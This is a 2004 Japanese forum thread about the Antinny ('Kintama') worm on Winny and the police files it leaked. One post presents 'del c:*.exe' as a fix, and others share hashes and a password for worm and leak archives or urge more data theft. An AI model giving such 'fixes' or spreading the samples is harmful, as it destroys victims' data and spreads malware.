そういやdllcacheにregedit.exeがないけど
OSで保護してるのはregedt32.exeだけということ？

キンタマ踏んだー！
オンラインスキャンで検索したらヒット！
でも、場所が
C:\System Volume Information\
というところにあるみたい。
探したけどフォルダさえ見つからない。
どこにあるか教えてくらはい。

>>529
>>503-505

>>530
意味がわかりません。

>>529(・∀・)ｺﾝﾆﾁﾜ！！

>>531
意味がわかりません。

>>529
ttp://support.microsoft.com/default.aspx?scid=kb;JA;309531
検索位はしてくらはい。

煽りでも何でもなく、>>529みたいな人がnyなんか使うのかぁ〜、と感心した。
時代は変わったんだなあ……。

ネトランのおかげです。

最近ではNHKも貢献しておられます

>>529のDQN数
キンタマ踏んだー！(+1024DQN)
探したけどフォルダさえ見つからない。(+256DQN)
どこにあるか教えてくらはい。(1024DQN)
合計 2304DQN

>>538
0点
ナインティナインのオールナイトにぽん

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Kerio4　http://www.kerio.com/kpf_appintegrity.html　なら

・キンタマウイルス　http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html
　による被害を防げる
　（玄人向けで有料だがTiny5でも防げる。
　　Sygate・Zone Alarmには似たような機能があるが防げない。
　　Outpost・Kerio2・ノートン・バスター・マカフィー・ウイルスセキュリティに至っては類似機能もない）
http://pc3.2ch.net/test/read.cgi/sec/1079605894/481

・現時点では日本語化できない
・Kerio2よりはわかりやすい
・SPIとIDS、トロイ対策のDLL監視機能もある（広告ブロックはPro版のみ）
・ルールに無い通信のログを出すためには、
　ﾙｰﾙの最後にunknownはﾌﾞﾛｯｸしてかつﾛｸﾞに載せるようなのを書けばいい
・Outpostなみに軽い
http://pc2.2ch.net/test/read.cgi/win/1077780039/233

●「Firewallと森で遊ぼう」Kerio Personal Firewall 4解説サイト
http://eazyfox.homelinux.org/Firewall/Kerio/Kerio41.htm

●Kerio Personal Firewall 4のログビューア
http://www.geocities.jp/masagooooool/

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

>>529
うはｗｗｗｗｗｗｗｗｗｗｗおｋｋｗｗｗｗｗｗｗｗｗｗ
おまえら！ｗｗｗｗｗｗｗいｗくｗぜーーーーーーー！！ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

クロソイド曲線.zip　345,522
c722ecfd30c7f22629b986b37cf898bb
Pass カーボンナノチューブ

でうpしておいた
朝方まで放流しておくので
欲しかったら持っていってくれ
おやすみ

>>542
うはｗｗｗｗおｋｗｗｗｗｗｗｗ！！１１１
俺がそのウイルス拡散してやらぁｗｗｗｗｗ！！！！１ｗｗｗｗｗ
お前等wwｗｗｗ！１いｗくｗぜｗ−−−−？？ｗｗｗｗｗｗｗｗ！！！！！！！！！１

>>542
見ての通りの基地外もたくさん見ているWeb上にウィルスの実体情報を
ばらまくのはいかがなものか。
ずぶの素人がウィルス手にして出来ることは悪意でまき散らすこと
ぐらいにしか結びつかない。
ウィルスを手にしてあれやこれや解析したりする趣味だとしても、
それはただの変人だからな？まじやめてくれ、素人さん。

キンタマってWebで拡散してるわけじゃないでしょ？

素人がまき散らしたところで素人しか引っかからないだろうから別にいいよ。

　　　　　　　　　　　　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　 ∧＿∧　 　ｶﾀｶﾀ　　 ／　　素人がまき散らしたところで
　（　　　　）　　∧ ∧ ＜　素人しか引っかからないだろうから別にいいよ。と
　（　　　　）　　(,,ﾟДﾟ)　 ＼＿＿＿＿＿＿＿＿＿＿＿＿
￣￣￣￣￣ （つ＿つ＿＿
￣￣￣日∇￣＼| BIBLO |＼
　　　 　 　￣　　　=======　　＼


／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
|　ほう、俺は玄人だぞと、そう言いたいわけですね
＼
　 ￣￣￣|／￣￣￣￣￣￣￣￣￣￣￣￣
　　∧＿∧　　　　　　　
　 （　・∀・）　 ∧∧ 　ｶﾞｰﾝ
　（　　⊃ ）　 (ﾟДﾟ；)　　
￣￣￣￣￣ （つ＿つ＿＿
￣￣￣日∇￣＼| BIBLO |＼
　　　 　 　￣　　　=======　　＼

'`,､'`,､'`,､'`,､'`,､(ﾉ∀`)'`,､'`,､'`,､'`,､'`,､

ｷﾝﾀﾏってどうやったら感染するの?

>>549
感染したいなら詰め合わせ落として
片っ端からクリック

>>550
お前優しいな

キンタマ新バージョンない？[オマンコ]とかなってる奴。
あれ新バージョンのウイルス？

ただ単にリソース書き換えただけだろ

外国人被害者っているの？

>>554
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G&VSect=S
報告はされていないけれど韓国とか台湾とかいそうだな

ちょうほうめがりゅーしほうｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
マンコに物故ﾝdねやるs是絵wwwwwwwwｗｗｗっわああああああああああああああああ
いはいあああああああああああああああいあひひひひひ」」
蒼ラオラオラオらおらおあおおおあおｒｋ；あぁさ
あいわｍｄこｐわ＠ｆじお＠あｆｈいいひゃはやはやはやはやはや
こいこいこいｷﾀｷﾀｷﾀｷﾀｰ!””””””””””２２２２２２２２２２２２２ｗくぇ
ウンコマンコチン小ぶりぶりまいんだぁぁぁぁぁぁあぁぁｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

偏差値が高いな

ﾀｶｲﾖ-ﾀｶｲﾖ-

ﾀｼｶﾆﾀｶｲﾖｰﾀｶｲﾖｰ

俺鹿島市娘好きだけど…だめなの？(つД｀) ｸﾞｽﾝ

http://headlines.yahoo.co.jp/hl?a=20040329-00000063-kyodo-soci

http://headlines.yahoo.co.jp/hl?a=20040329-00000103-yom-soci

( ´-｀)＜ネットに繋がなきゃいいんとちゃう？

>>561
消されたな。
>>562にはwinnyの記述が無いし、身内にはとことん甘いのね。

警察ファイルで拡張子 .mj2 .MJ4 の文書の開き方がわからない。
ちょっと見当つかないけど暗号化ファイル？ですか。

MJ4、MJ2形式の拡張子は、リコーの文字ピタッ！ってソフト。
http://www.rsk-tokyo.co.jp/products/software/pitatt_v2/index.html
体験版で見れます。

Winnyって京都府警公認だったんですね

>>566 ありがとう。
例の警察ファイルで
MJ4、MJ2形式の拡張子の文書を見る方法。
リコーの文字ピタッ! Pro V2がそれ用のソフト。
体験版があるのでインストール。
ttp://www.rsk-tokyo.co.jp/products/software/pitatt_v2/trial.html
ttp://www.rsk-tokyo.co.jp/products/software/pitatt_v2/index.html

ちょっとサーバー人数制限がキツキツみたいなんで
気長に待ってればよし。

[キンタマ] 俺のデスクトップ りょう [04-03-20](ファイル詰め合わせ).zip 26,962,543 25067a782604be95bb265db082173c9c
↑
京都府警のりょうさん

>>569
その詰め合わせに入ってるごみ箱
キンタマだろうけどノートン反応しないね

>>570
ふんだけどなにもおこらんよ。

v7，1なら感染しても放流はしないのかな？
バスターでは感染は無かったけど。
だれか解説してくれるHPを教えやがれ！おながいします。

>>571
（・∀・）ｺﾝﾆﾁﾊ!!

アンチウィルスに頼るアホはすぐに亜種にやられるぞ

>>571
PCを再起動＆Winny起動しる

そうすれば、 （・∀・）ｺﾝﾆﾁﾊ!!

>>570
eTrustも反応なし。
A2は反応したが。

PestPatrolで検知ＯＫ！
この手のウィルスはny諸共消し去るのが良いですね。

ver7.1なら・・・・・とか言うのたまに見るがキンタマってUpfolder.txt直接書き換えだろ？
漏れは感染してないし詳しいことはよく知らないがわざわざny通して書き換えるとは思えんし。
7.1使ってる人はフォルダ関係書き換える時はtxtとかiniを直接書き換えてるんだろうし
それなら大丈夫だってことぐらい分かってるだろう。

>>578
>わざわざny通して書き換えるとは思えんし。
えっ！？　何を言ってるんだか。

>>579
ny通して書き換えるのか？
つーことはver7.1の人はキンタマ感染したあとにny起動したら強制的に終了されるわけですか？
そんな報告聞いたことないんだけどな・・・

おばかさんはスルー汁

nyを操作する技術があれば
アップフォルダー登録なんかせずにキャッシュ化して元ファイル消すと思われ
その方が見つかりにくいし

作者さんが「その手があったか！」と思うのも時間の問題です。

ゴミ箱　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.exe







はノートンも検知しないぞ！気を付けろ。

Norton AntiVirus>レポート>検疫項目>項目の追加
でキンタマウイルスをあらかじめ削除してしまえば踏む危険性が減る。
ついでにキンタマをシマンテックに提出すれば定義ファイルにキンタマ亜種も追加される鴨。

ファイラによってはそんなもんもろバレだけどな。

>>585
　 ､-―――――――--　､
　　ヾ:::::::::::::::::::::::::::::::......　　　ヽ
　　　〉￣`´￣￣￣｀ヽ:::: 　 　 |
　　 ﾚ ⌒ヽ_／ ⌒ヽ　 ヽ:::.　　 |
　　γ⌒ヽ　 ／⌒ヽ|l　 |:: 　 　|
　　 |　⌒｡|_ﾉ　⌒｡ 　　　〉 , -､|
　　〈 ￣「￣　　￣　〃　|_l r　|　　　 ／￣￣￣￣￣
　　 |　 └┬^, , ,__,　　　　 7 ﾉ　　＜　それを言っちゃーお終ぇーよ
　　｜　　｀l￣￣ン　　　, ┬´　　　　＼＿＿＿＿＿
　 　 |　　　￣￣　　　≠　 |
　　　 ゞ､　　　　　__≠　　｜
　　　　　｀|￣゛゛　　　　　ノl

　　　　　　　　　　　　47氏
　　　　　　　　　　　　　↓
　　　　　　V　　　~-ｖ( 'A)丶　　／ﾌﾟﾙﾙﾙﾙ･･･
　　　　　［ □］　　 ﾍﾍ ノヽ　苗 ￣

　　　　ｶﾁｬ
　　 ＿＿＿＿＿＿＿＿　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　（ はい、もしもし・・・ )　| あ、京都府警ですがnyファイルの削除方法ありませんか？
　 　￣￣￣￣￣￣￣∨ 　 ＼　 ＿＿＿＿＿＿＿＿_＿＿＿＿_＿_＿_＿
　　　　　　 　V　　　　　　　　　|／
　　　　　　［ □］　　　　('A`】>
　　　　　　　エ　　　　 ﾍﾍ ノ ｀~~田＿＿＿＿＿＿


　　　　　　V　　　ﾌﾟ( ´,_ゝ｀)　　　ｶﾁｬ･･･
　　　　　［ □］　　 ﾍﾍ ノ￣苗

WinMXでhttp://www.riaj.or.jp/piracy/winmx/
というアドレスが日本音楽協会から送られてきたと
友達が言っていたんですけど
このままWinMXを使っても大丈夫ですか？

>>588
ぜんぜん大丈夫。まったく気にしなくていい。

そりゃ警察だってWinnyですから人間ぐらい使いますよ

まず、もちつけ！

　　　　　／＼⌒ヽﾍﾟﾀﾝ
　　　／　 ／⌒)ﾉ ﾍﾟﾀﾝ
　 ∧＿∧ ＼ （(　∧＿∧
　（； ´Д｀））'　））（・∀・ ；）
　/　　⌒ノ　（ ⌒ヽ⊂⌒ヽ
.（O　　 ﾉ　)￣￣￣(）__ 　 ）
　）_）＿） （;;;;;;;;;;;;;;;;;;;）（＿（

>>588
そのイタズラまだ流行ってるんだ
なつかしい

>>588
その質問とこのスレとどんな関係があるの

キンタマ踏んだかも。。。
top.jpgなるファイルが削除できない。
助けて…

>>594
自業自得

>>594
スタートボタン→ファイル名を指定して実行　で「cmd」と入力してEnter
MS-DOS窓が開くので　del c:*.exe と入力してEnter

これで大丈夫だ。

俺のデスクトップ*.zipを解凍したら、アイコンがIEに
なってるファイルがあった。
思わずダブルクリックしたらコマンドプロンプトが出て、
ファイルをコピーしましたとか出て、あわてて×ボタン
を押した。(後に気づいたが、先のIEアイコンのファイル
は拡張子が無かった)

再起動したら壁紙が刺激の強すぎる無修正画像に！(泣)
取りあえずシステムフォルダから画像削除したが、
コントロールパネルも開けず、デスクトップでの
右クリックが禁止状態。
ファイル名指定regeditではメモ帳。
今のところUpFolder.txtに影響はない。

これってやっぱキンタマ？？

WinMXやっていない俺は















勝ち組

>>597
ハンマーでおまえのパソコン叩き割っていいよ。ついでに自分の頭もな。

>>596
qオプションを付ければ完璧

　　　　　　　　　　　　　　　　＼　│　／
　　　　　　　　　　　　　　　　　／￣＼　　 ／￣￣￣￣￣￣￣￣￣
　　　　　　　　　　　　　　　─（ ﾟ ∀ ﾟ ）＜　>>597 キンタマキンタマ！
　　　　　　　　　　　　　　　　　＼＿／　　 ＼＿＿＿＿＿＿＿＿＿
　　　　　　　　　　　　　　　　／　│　＼
　　　　　　　　　　　　　　　　　　　 ∩ ∧　∧　　／￣￣￣￣￣￣￣￣￣￣
￣￣￣￣￣￣￣￣＼∩ ∧　∧　＼（ ﾟ∀ﾟ）＜　>>599 園児なみのｵﾂﾑだね！
>>599 知らないから　 ＞（ ﾟ∀ﾟ ）/ ｜　　　　/　＼＿＿＿＿＿＿＿＿＿＿
答えれないんだね／ ｜　　　 〈　｜　　　｜
＿＿＿＿＿＿＿／　　　　　 /　／＼_」　/　／＼」
　　　　　　　　　　　　　 ￣　　　　 / ／
　　　　　　　　　　　　　　　　　　　￣

キンタマ、最高だな。こんな楽しいウイルス初めてだ。
他のって全然作者以外は楽しくないけど、キンタマはかからなきゃかなり楽しい！
ってかかかる奴はアホだろ。

なんでもそうだがまともに使い方を知らずに手を出すから怪我をするんだよ。
生兵法は怪我の元。あほだねぇ。
作者よ！マイドキュメントをアップロード（サイズ制限でもつけて）するように改良汁！
ユーザー名は得られてるんだから、パスは得られるだろ。もともとWinにしか感染しないんだし。

>>585
　例えばどんなファイラ？
エクスプローラでも一覧にしてれば大概気づくけど…いいのがあるなら知りたい。

>>597
漏れも感染したよ。さてとせっかくだから再インスコでもしますかな。。

>>603
マウス型は知らんけどキーボード型ファイラは多分大抵のが大丈夫かと思われ。

キンタマって壁紙も変えるのか？

道警の流出キンタマらしい
[キンタマ] 俺のデスクトップ yo-ichi [04-03-29](ファイル詰め合わせ).lzh 271,579 c97cc30847e8abe2285d82bab20426ff

>>607
のファイルの中にはフォルダ偽装タイプでノー�dでもスルーされる奴がいるので注意ね。

エラーが出てうまく実行できなかった。このウイルスどんなことするの？

他人の振り見て我が身を直せとも言うよな。

Winny騒動終結のシナリオ

1. 京都府警がキンタマウイルスにかかったふりして、
　11月に押収していたWinnyのソースコードをWinnyネットワークに放出する。
2. ソースコード改造祭り開催。
3. 重大なバッファーオーバーフロー脆弱性が発見される。
4. パッチが提供される。
5. 脆弱性を突いた凶悪なワームが広がる。
6. 皆、必死でパッチをあてる。
7. 実はそれは京都府警が配布した、削除コマンド付きWinny化パッチだった。
8. Winnyネットワークは、めでたくデータ削除可能となる。

-1. 京都府警がキンタマウイルスを製造。Winnyネットワークに放出。
0. 京都府警の適当な巡査がキンタマウイルスにかかってみせることで、
　警察さえも感染するほど、Winnyはそういう凶悪なものなんだという世論の
　認識を醸成。

警察が感染というよりも馬鹿が警官だったという話で。

581 [名無し]さん(bin+cue).rar sage New! 04/03/29 22:40 ID:Ur0MNsln
ﾊｯｽ見つけた
[キンタマ] 俺のデスクトップ yo-ichi [04-03-29](ファイル詰め合わせ).lzh 271,579 c97cc30847e8abe2285d82bab20426ff

597 [名無し]さん(bin+cue).rar sage New! 04/03/29 22:49 ID:Flc5PMln
yo-ichiキター！
しかしjtdって何だ。

一時不停止.jtd
現逮（道交法）.jtd
公務執行妨害（見分）.jtd
参報（公明党）.jtd
事故発生報告.jtd
自動車盗（見分）.jtd

↑
こんどは道警…なにやってんだお前ら

道警は一太郎の文書ファイルか・・・

ｷﾝﾀﾏ本体の拡張子をtxtにしてDeDeにD&Dしたら起動しやがった・・・。
偽のエラーメッセージが出た時点で強制終了したら何も悪さしてないみたいだけど。
DeDeってﾔｳﾞｧｲもの開くもんじゃないね。

Thumbs.dbに偽装して置かれたりしたら引っかかりそう

Thumbs.dbなんか開こうとしないし即削除するから引っかかるわけない。

Kerio Personal Firewall 4

・キンタマウイルス　http://internet.watch.impress.co.jp/cda/news/2004/03/29/2593.html
　による被害を防げる
　（玄人向けで有料だがTiny5でも防げる。
　　Sygate・Zone Alarmには似たような機能があるが防げない。
　　Outpost・Kerio2・ノートン・バスター・マカフィー・ウイルスセキュリティに至っては類似機能もない）

・現時点では日本語化できない
・2バイト文字には対応していません。
・Kerio2よりはわかりやすく、Zone AlarmのようにYES/NOだけでもいけるし
　kerio2のように詳細ルールも作れる
・SPIとIDS、トロイ対策のDLL監視機能もある（広告ブロックは有償版のみ）
・Outpostなみに軽い
http://pc2.2ch.net/test/read.cgi/win/1077780039/233

●「Firewallと森で遊ぼう」Kerio Personal Firewall 4解説サイト
http://eazyfox.homelinux.org/Firewall/Kerio/Kerio41.htm

●Kerio Personal Firewall 4のログビューア
http://www.geocities.jp/masagooooool/

617の言いたいこと判らんけど
Thumbs.db　長〜い　.exe
にしておいて
htmlでも開いたら実行されるようにするということか?

これは画像集ならThumbs.dbあっても不自然に感じないから初心者ならかかるかもな…

おれもThumbs.dbはすぐ捨ててしまうけどな。

全員「おお　これがキンタマクラスタの姿か！！」

紫龍「以前老師にお聞きした事があるがキンタマクラスタは
　　　他のクラスタとは大きく違うところがあるのだ」

聖矢「な…なんだ紫龍　ダウソ中の
　　　(ロリ動画)(無修正)谷津●学校5年生並木アヤちゃん（巨乳小学生，最後に脱糞）.mpg
　　　の部分キャッシュを脱ぎ捨てて…まさかその.exeファイルを実行するのか
　　　なにいファイルの一部が分解して紫龍の手に握られた、あれは！？」

紫龍「[キンタマ] 俺のデスクトップ nao [04-03-18].jpg！！」

聖矢「そ…それではキンタマクラスタというのは…！」

紫龍「そうだ、キンタマクラスタのファイルは実行するだけでなくひとつひとつが武器になるのだ！」

瞬「す…すごい
　　すべてがひと振りでユーザーの社会生命を砕きそうだ」

聖矢「むう…K察のひとりひとりがこれを手にしたら
　　　まさしく鬼に金棒だ」

紫龍「この中かでひとつだけ国家権力を裂くのにあった武器を選ばなければ京都府警どころか
　　　　中にいる47氏のPCさえも粉々にしてしまうからな…
　　　　
　　　　よし　これを使わせていただきます　老師！
　　　　この　[キンタマ] 俺のデスクトップ りょう [04-03-20](ファイル詰め合わせ).zip　を…
　　　　
　　　　いまその中から救い出してやるぞ
　　　　そしてふたたび俺たちの前に…
　　　　よみがえれ47氏よ！！」

あー転載するスレまちげえた
すまん…

>>621-622
　　　　　　 ＿＿ ＿＿＿ ＿＿ ＿ _
　　　　 ／´ 　　　　　　　　 　　　　／l
　　　／ 　 |　　　　　　　　　　 ,,,／ u |
　　　l￣￣￣￣￣￣￣￣￣￣ｌ　　　i
　　　|　// |.　　　,、,、　u　　　..i　//,,,|
　　　|　 　 |　　 , =♀=　　　　　|.　 　 |
　　　|　Ｊ ,,|　　ミ,,ﾟДﾟ彡　　U　|　.// |
　　　i　　　|　J .((　目)つ // 　| ... ,,,,,|
　　　|　 ／￣￣ﾐ=[ニ]￣//￣..i￣ ,／ 　
　　　|／　　　　　 し' J 　 　 　 | ／
　　　￣￣￣￣￣￣￣￣￣￣
　　　　　　もう少し寝かせてくれ

読売 http://www.yomiuri.co.jp/national/news/20040330ic21.htm
> 流出したのは、「現行犯人逮捕手続き書」「実況見分調書」「捜査報告書」など６件の
> 捜査情報で、ネット上の掲示板に掲載された。
> 道警は、捜査情報が掲載されていた掲示板の管理人に削除を求める一方、情報漏れ被害
> を受けた８人に事情を説明している。

朝日 http://www.asahi.com/special/yahoobb/TKY200403300370.html
> 資料は２９日夜にインターネット上のホームページの掲示板に掲載され、３０日未明に
> 警察庁から道警に連絡があった。
> ただし、道警は掲示板の管理人を確認できておらず、流出データは削除できていないという。

共同 http://www.kyoto-np.co.jp/news/flash/2004mar/31/CN2004033001005095B1Z10.html
> 北海道警は３０日、道交法違反事件などの関係者８人分の個人情報を含む捜査関係資料が、
> インターネットの掲示板に流出したと発表した。道警が掲示板の管理人の特定を急いで
> いるが、掲載されている氏名、住所など個人情報の削除のめどは立っていないという。

絶対ネタだと思ってたのに　マジだったのか

まじだったのです

なんかまた凄い亜種でたんだな
今度は本当にメール送信だとよ

一応ね

http://tmp2.2ch.net/test/read.cgi/download/1080702855/147
147 名前：[名無し]さん(bin+cue).rar[] 投稿日：04/03/31 14:32 ID:IqKmbbNb
ここの　http://securityresponse.symantec.com/avcenter/venc/data/w32.antinny.k.html　

＞10．　The worm attempts to access http:/ /www.accsjp.or.jp and send personal information, if the system date is April or later, and the ＞　　　　number of the month and date match.
＞
＞　　　　For example, April 4th, May 5th or December 12th. (4/4, 5/5, and 12/12, respectively.)

これってすごくない？
前からあったのか？？

こんどはW32.Antinny.K だと。
やっぱsymantec対応早いﾅｰ
ちぇいさーが対応するのは4/10頃か。

とんでもねぇな

で、今度こそキンタマのKという事でよろしいか？

こんどは北海道警察がキンタマになったのか

そしてやはりバスター全力で未対応

さすがバスター
後手後手の達人

シマンテックのレポみたら本当に送信するみたいだな
4/4までに対応できなかったら感染者にとってもう
バスター存在する意味無いなｗ

ワームは、システムの日付が4月以降で、月と日が合致する場合（例えば4月4日、5月5日、12月12日）、
http://www.accsjp.or.jpにアクセスし、個人の情報を送ることを試みます。

警察関係者が感染した場合、ACCSが握り潰す予感。
ccで2ちゃんにもスレ立てて晒してくれる機能の追加ｷﾎﾞﾝﾇ＞作者さん

なんじゃこりゃ、どういうカラクリでそこにアクセスするん？

ここまでされると警察が誰か雇って作らせてるんじゃないか、と思えてくる。
ほら、例えば47氏とか。

普通にポート開くだけだろうから
PFWではじける可能性は高いな。

傍観者にとっては面白くない機能だね。
accs側は水も漏らさぬ受信体制を整えてたりするんだろうか?

エンコ職人達の無害な遊びが2/11スタート、
ウイルスによるキンタマ流出最古が2/20頃？って言われてるから、
ウイルス本体が出回り始めたのって
その１週間の間に作成されてながれたのかな。
それとも元々出来ていた物をキンタマ遊びにあわせたんだろうか。
感染して再起動で速効発病だろうから、
最初のウイルスが流されたのって、18〜19日とか？

その流れる情報が法的に証拠能力があるのなら、(　´_ゝ｀)ｂｸﾞｯｼﾞｮﾌﾞ

証拠能力はなくとも効果的な捜査ができるな

確実に検挙できそうなファイル持ってる香具師のリストが手に入るのだから

こんなのはどうよ

572 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/03/31 18:49 ID:6T4iHIDa
ぉ、おまいらキンタマの疑いがある.exeをノートン先生でスキャンしても感染するぞ。
気をつけれ。

　　('A`)　…
　　（ヽ/）
　 ＜●＞

　　　　 ●
　　('A`)ﾉ　ﾊｯ !!
　　（ヽ　）
　 ＜●＞

　 ●
　 （('A`)　ﾊｯ !!
　　（　 /）
　 ＜●＞




　 ●　　●
　 （('A`)ﾉ　ﾊｯ !!
　　（　　）
　 ＜ω＞

>>644
それだったら全部のチェッカー全滅だろ

Symantec Norton Internet Security ならびに
Symantec Norton AntiSpam 2004 でセキュリティ上の脆弱性
危険性　高
任意のコードをリモートから実行することが可能に
ttp://www.symantec.co.jp/region/jp/sarcj/security/content/2004.03.19.html

24時からエイプリルフールで情報が錯綜するので身構えておけよ

２ちゃんはもともと（ry

明日は４月バカ
ここは毎月バカ

non.毎日

大変な事になった
http://leaf64.net/ny2/

http://blog.seesaa.jp/
ひろゆき社長就任

ttp://www.geocities.jp/roriura/ny_ryo.html

うぃにサクジョしたのにregeditでメモ帳が・・・〓■●

ﾅｾﾞﾀﾞ

>>655
(・∀・)ｺﾝﾆﾁﾊ!!

はい
(・∀・)ｺﾝﾆﾁﾊ!!

結局このＧってのはＷＩＮＮＹのＵｐフォルダがなかったらネット上に晒されることはないのか？

>658
winny使用してなければダイジョーブ

>>658
>>628
KはWinny起動させなくてもリスクがあるのではないか

今日はキンタマよりKTXだろ

【緊急：W32.HLLW.Antinny.G の亜種が急速に拡散】

キンタマウィルスの亜種。
メールでデスクトップ画像とマイドキュメントのファイルの一部を添付するウィルス。

感染台数: 0-15895
報告件数: 0-14425
地域感染度: 高
対処レベル: 高
駆除: 難

すべて「高」ｗ
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.h.html

Upfolder.txt の属性を読み取り専用（書き込み禁止）にしたんだけどキンタマに効果有るかな？

　　　　　　　　　　　　　　＼　　　∩─ｰ､
　　　　　　　　　　　　　　　 ＼／　●　､_ ｀ヽ
　　　　　　　　　　　　　　　　/ ＼(　●　 ● |つ
　　　　　　　　　　　　　　　　|　　 X_入__ノ 　 ミ　そんなエサでは釣られないクマ・・・
　　　　　　　　　　　　　　　　 ､　(＿／　　　ノ
　　　　　　　　　　　　　　　　　＼＿＿＿ノﾞ
　　　　　　　　　　　　　　　　 ／ 丶'　⌒ヽ:::
　　　　　　　　　　　　　　 　/ ヽ　　　 /　/:::
　　　　　　　　　　　　　　　/　/へ ヘ/　/:::
　　　　　　　　　　　　　　 /　＼ ヾミ　 /|:::
　　　　　　　　　　　　　　（__／| ＼___ノ/:::

Winnyユーザーの個人情報をACCSに送信するウイルスが出現
〜4月4日や5月5日になると、「www.accsjp.or.jp」にアクセス
http://internet.watch.impress.co.jp/cda/news/2004/04/01/2639.html

Antinny.G(olden ball)
Antinny.K(intama)

(・∀・)ｺﾝﾆﾁﾊ!!

>>667
http://raus.de/crashme/
(・∀・)ﾆﾔﾆﾔ

キンタマの作者はやぱりACCSだったようですね。

１．５はやめたまえ

>>665
これ、ACCSに対するDDoS攻撃になるんじゃないのか?

ACCSが「被害」と考えるのか「収穫」と考えるのかによって違う。

内心は収穫と思っていても、外向けには被害を装いそうだな。
そっちの方がny潰しに役立ちそうだし。

悪巣はnyを潰そうなんて思っちゃいませんよ。
nyが消えたら悪巣だって仕事が減って予算削られちゃったりして困るじゃないですか。
たま〜に逮捕者を出したりしてnyユーザに睨みをきかせつつ悪巣会員に仕事してますよ〜とアピールする、
これくらいがちょうどいいと悪巣もわかってますよ。

>>674
nyとは関係なく予算があるわけだが

>>629
127 名前： 名無しさん＠お腹いっぱい。 [sage] 投稿日： 04/04/01 21:33
今日、キンタマ調べてみたよ
ノートン、バスターで反応したけどチェイサーは反応しなかったよ。
一番最初に出たキンタマね。

キンタマ保菌者でも無問題の方法思いついた。
デスクトップとマイドキュメントに数Gの暗号化ファイルを一個づつ置いとけばいいんじゃね？

>>677
馬鹿だな。
Winnyをやらない。
メールアドレスは全て手打ち。クッキーも常に削除。

これだけでOKだよ。とにかくWinnyをやらなければ問題なし

OutlookExpress ってｱﾝｲﾝｽｺできんの？

そんなこと質問するよりやってみた方が早いと思うぞ

Kerio4　http://www.kerio.com/kpf_appintegrity.html　なら

・キンタマウイルス　http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html
　による被害を防げる
　（玄人向けで有料だがTiny5でも防げる。
　　Sygate・Zone Alarmには似たような機能があるが防げない。
　　Outpost・Kerio2・ノートン・バスター・マカフィー・ウイルスセキュリティに至っては類似機能もない）
http://pc3.2ch.net/test/read.cgi/sec/1079605894/481

・現時点では日本語化できない
・Kerio2よりはわかりやすく、Zone AlarmのようにYES/NOだけでもいけるし
　kerio2のように詳細ルールも作れる
・SPIとIDS、トロイ対策のDLL監視機能もある（広告ブロックは有償版のみ）
・ルールに無い通信のログを出すためには、
　ﾙｰﾙの最後にunknownはﾌﾞﾛｯｸしてかつﾛｸﾞに載せるようなのを書けばいい
・Outpostなみに軽い
http://pc3.2ch.net/test/read.cgi/sec/1074563750/156

●「Firewallと森で遊ぼう」Kerio Personal Firewall 4解説サイト
http://eazyfox.homelinux.org/Firewall/Kerio/Kerio41.htm

●Kerio Personal Firewall 4のログビューア
http://www.geocities.jp/masagooooool/

このコピペマジ？

>>679
ここ見てやれば完璧。Edmaxでも入れとけ。

＞＞679
貼り忘れた
ttp://ebisukenta.jp/w2koe.html

たったいまキンタマ感染記念カキコ

(･∀･)ｺﾝﾆﾁﾊ!!　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 .exe

( ´∀`)σ)Д`)　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　click

( ´∀`)σ)Д`)　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.exe

>>682
ありがとう〜、後で試してみます。
これで、ｷﾝﾀﾏがメール飛ばすの封じられるかなぁ。
もしかして、smtp周りの処理を独自内臓してたりするのか？

>>679

OutlookExpressをｱﾝｲﾝｽｺしたところで、DotNetFramework1.1が
導入されていれば、簡単にいくらでもやり放題。
仮に両方無くても自前ロジックでやり放題。

危ないことは、危なくなっても良い環境でやるべし。
ちなみに安全環境をDualBootで非アクティブパーティションにするだけじゃ無駄だよ。
その程度なら、いくらでも触れるから。

>>689
ん〜そだな〜
せめてBIOSでインターフェースごと切り離す位しとこーよね〜

>>689
ありがと。
wine上で動かしてるが、どこまでvirusも動いてしまうかだなぁ。
ま、感染してないから問題無いと思いたい。

既出だろうが今週のＴＶブロスにキンタマのこと書かれてあったよ。

>>692
詳しく

>>692
俺もみたｗ

自分がny厨なのを暴露しているようなもんだ

あげ

Kさんの活動時間が迫ってきたのでage

あと3分

kの活動って目に見えるの？
結果がわかるのは当分先のような気がするのだが…
どうせなら掲示板にカキコするようなプログラムにしてくれれば面白かったのに…

700

あぼーん

574 ：[名無し]さん(bin+cue).rar ：04/04/04 05:40 ID:xNh4T3wm
あと、4月5日に進めてみたんだけど、
msvidctl32.exeってのがどこかにアクセスしまくってめちゃくちゃ重くなった。
日付戻したら直ったけど。どうすりゃいい？

575 ：[名無し]さん(bin+cue).rar ：04/04/04 05:44 ID:xNh4T3wm
日付を戻した瞬間ピタッと止まる。
アクセス先が0.0.0.0:0だった。
4日になった瞬間を体感したらdll書き換えられたりするの？
それとも再起したらやばい？

578 ：[名無し]さん(bin+cue).rar ：04/04/04 05:50 ID:xNh4T3wm
再起動した。んで、また日付進めてみたら違うプロセスでアクセスする。
当分4月4日以降には出来ないな。鬱だ

Download板昨日から落ちっぱなし？

つまりKにかかるとシステムの時計を進めようとしても無理になるってことか？

>703
